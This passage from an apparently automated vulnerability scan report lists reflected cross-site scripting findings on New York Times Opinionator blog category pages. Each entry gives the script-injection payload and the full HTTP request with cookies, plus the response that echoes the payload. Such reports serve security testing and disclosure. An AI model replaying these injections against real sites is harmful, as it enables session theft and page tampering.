<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires/pagef2385\"><script>alert(1)</script>2952f429861/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.200. http://opinionator.blogs.nytimes.com/category/linda-greenhouse [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/linda-greenhouse

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c74"><script>alert(1)</script>11109981c61 was submitted in the REST URL parameter 2. This input was echoed as a3c74\"><script>alert(1)</script>11109981c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/linda-greenhousea3c74"><script>alert(1)</script>11109981c61 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:19:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:19:48 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/linda-greenhousea3c74\"><script>alert(1)</script>11109981c61&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.201. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/linda-greenhouse/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8e10"><script>alert(1)</script>f92f7baf431 was submitted in the REST URL parameter 2. This input was echoed as a8e10\"><script>alert(1)</script>f92f7baf431 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/linda-greenhousea8e10"><script>alert(1)</script>f92f7baf431/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:20:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:20:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/linda-greenhousea8e10\"><script>alert(1)</script>f92f7baf431&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.202. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/linda-greenhouse/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9c99"><script>alert(1)</script>050246b50c5 was submitted in the REST URL parameter 3. This input was echoed as e9c99\"><script>alert(1)</script>050246b50c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/linda-greenhouse/feede9c99"><script>alert(1)</script>050246b50c5/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/linda-greenhouse/feede9c99\"><script>alert(1)</script>050246b50c5&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.203. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/linda-greenhouse/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e088"><script>alert(1)</script>01f52420557 was submitted in the REST URL parameter 3. This input was echoed as 4e088\"><script>alert(1)</script>01f52420557 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/linda-greenhouse/page4e088"><script>alert(1)</script>01f52420557/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:21:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:21:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/linda-greenhouse/page4e088\"><script>alert(1)</script>01f52420557/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.204. http://opinionator.blogs.nytimes.com/category/line-by-line [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/line-by-line

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afa55"><script>alert(1)</script>4debbb31b46 was submitted in the REST URL parameter 2. This input was echoed as afa55\"><script>alert(1)</script>4debbb31b46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/line-by-lineafa55"><script>alert(1)</script>4debbb31b46 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:48 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/line-by-lineafa55\"><script>alert(1)</script>4debbb31b46&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.205. http://opinionator.blogs.nytimes.com/category/line-by-line/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/line-by-line/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b31d"><script>alert(1)</script>e2325ab679c was submitted in the REST URL parameter 2. This input was echoed as 7b31d\"><script>alert(1)</script>e2325ab679c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/line-by-line7b31d"><script>alert(1)</script>e2325ab679c/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/line-by-line7b31d\"><script>alert(1)</script>e2325ab679c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.206. http://opinionator.blogs.nytimes.com/category/line-by-line/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/line-by-line/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a188"><script>alert(1)</script>b9dda51b1a3 was submitted in the REST URL parameter 3. This input was echoed as 5a188\"><script>alert(1)</script>b9dda51b1a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/line-by-line/feed5a188"><script>alert(1)</script>b9dda51b1a3/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:24:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:24:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/line-by-line/feed5a188\"><script>alert(1)</script>b9dda51b1a3&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.207. http://opinionator.blogs.nytimes.com/category/line-by-line/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/line-by-line/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9994f"><script>alert(1)</script>08ffe0e76da was submitted in the REST URL parameter 3. This input was echoed as 9994f\"><script>alert(1)</script>08ffe0e76da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/line-by-line/page9994f"><script>alert(1)</script>08ffe0e76da/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/line-by-line/page9994f\"><script>alert(1)</script>08ffe0e76da/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.208. http://opinionator.blogs.nytimes.com/category/living-rooms [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/living-rooms

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68da3"><script>alert(1)</script>6b77f45f4e6 was submitted in the REST URL parameter 2. This input was echoed as 68da3\"><script>alert(1)</script>6b77f45f4e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/living-rooms68da3"><script>alert(1)</script>6b77f45f4e6 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:29:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:29:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/living-rooms68da3\"><script>alert(1)</script>6b77f45f4e6&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.209. http://opinionator.blogs.nytimes.com/category/living-rooms/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/living-rooms/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4427"><script>alert(1)</script>ffaa5e8cd26 was submitted in the REST URL parameter 3. This input was echoed as b4427\"><script>alert(1)</script>ffaa5e8cd26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/living-rooms/feedb4427"><script>alert(1)</script>ffaa5e8cd26/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
